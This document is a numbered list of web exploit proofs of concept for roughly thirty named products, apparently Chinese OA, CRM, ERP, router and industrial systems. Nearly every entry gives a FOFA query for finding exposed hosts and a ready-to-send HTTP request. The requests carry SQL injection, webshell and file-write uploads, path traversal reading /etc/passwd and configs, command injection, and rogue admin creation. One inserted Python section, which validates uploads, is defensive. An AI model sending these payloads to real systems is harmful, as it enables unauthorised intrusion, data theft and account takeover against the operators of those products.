Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

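Entries 155, 157, 162, 163, 164 and 176 above (and 178 below) share one weakness: the server keeps whatever filename and Content-Type the client declares, so a `.php` or `.aspx` body labelled `image/png` is stored as an executable page. What follows is an added example, not code from the original post or from any of the listed products, of the server-side checks that would have stopped every one of them: a minimal multipart/form-data splitter, an extension allowlist, a magic-byte sniff compared against the declared type, a scan for server-side script markers, and a random server-generated filename so the client's name is never reused. The boundary string and the benign PNG part are constructed for this example; the two malicious parts reuse the file parts quoted in entries 155 and 164.

```python
import re
import secrets

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}
MAGIC = [  # (leading bytes, media type) for the formats the allowlist admits
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff",      "image/jpeg"),
    (b"GIF87a",            "image/gif"),
    (b"GIF89a",            "image/gif"),
    (b"%PDF-",             "application/pdf"),
]
SCRIPT_MARKER = re.compile(rb"<\?php|<\?=|<%")   # PHP / ASP / JSP openers; a triage signal, not proof
FILENAME = re.compile(r'filename="([^"]*)"')


def parse_multipart(content_type: str, body: bytes):
    """Minimal multipart/form-data splitter: returns [(headers, data)] per part."""
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(1).strip().strip('"').encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip().lower()] = value.strip()
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts


def sniff(data: bytes):
    """Media type implied by the leading bytes, or None if it is no known image/PDF."""
    for prefix, media in MAGIC:
        if data.startswith(prefix):
            return media
    return None


def inspect_upload(content_type: str, body: bytes):
    """Return [(client_filename, [reasons to reject])] for every file part."""
    findings = []
    for headers, data in parse_multipart(content_type, body):
        name_match = FILENAME.search(headers.get("content-disposition", ""))
        if not name_match:
            continue                          # ordinary form field, not a file
        name = name_match.group(1)
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        reasons = []
        if ext not in ALLOWED_EXTENSIONS:
            reasons.append(f"extension '{ext}' not allowlisted")
        declared = headers.get("content-type", "")
        actual = sniff(data)
        if actual != declared:               # the declared type is client input, the bytes are not
            reasons.append(f"declared {declared or 'nothing'} but bytes look like {actual or 'no known image/PDF'}")
        if SCRIPT_MARKER.search(data):
            reasons.append("server-side script markers in content")
        findings.append((name, reasons))
    return findings


def verdict(findings) -> str:
    return "reject" if any(reasons for _, reasons in findings) else "accept"


def server_side_name(client_filename: str) -> str:
    """Random stem, extension taken only from the allowlist; the client's name is never stored."""
    ext = client_filename.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowlisted")
    return f"{secrets.token_hex(16)}.{ext}"


def build(boundary: str, parts) -> bytes:
    """Assemble a multipart body from (content-disposition, content-type, payload) tuples."""
    out = b""
    for disposition, ctype, payload in parts:
        out += (f"--{boundary}\r\nContent-Disposition: {disposition}\r\n"
                f"Content-Type: {ctype}\r\n\r\n").encode() + payload + b"\r\n"
    return out + f"--{boundary}--\r\n".encode()


BOUNDARY = "----WebKitFormBoundaryExample"   # constructed for the example
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
# File part from entry 155: PHP declared as image/png
BODY_155 = build(BOUNDARY, [('form-data; name="file"; filename="test.php"', "image/png",
                             b"<?php phpinfo();unlink(__FILE__);?>")])
# File part from entry 164: ASPX declared as image/jpeg
BODY_164 = build(BOUNDARY, [('form-data; name="Filedata"; filename="qaz.aspx"', "image/jpeg",
                             b'<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>')])
# Constructed benign part: a genuine (truncated) PNG header under its real name and type
BODY_OK = build(BOUNDARY, [('form-data; name="file"; filename="logo.png"', "image/png",
                            b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)])

if __name__ == "__main__":
    for label, body in (("155", BODY_155), ("164", BODY_164), ("benign", BODY_OK)):
        found = inspect_upload(CONTENT_TYPE, body)
        print(label, verdict(found), found)
```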
177. H3C router sensitive information disclosure
The device configuration file is fetched by model name through a traversal off userLogin.asp:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the uploaded file:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 (Jianwen engineering management system) arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 (SunFull) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT sent straight to the AddUser endpoint.

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: your-ip

The stacked statement uses INTO OUTFILE to write a file (plom.xgi) under WebRoot; the hex literal passed to unhex() is the file content.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection (same CVE as entry 158; time-based payload)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 (Jiahui) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical image viewer deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php


200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--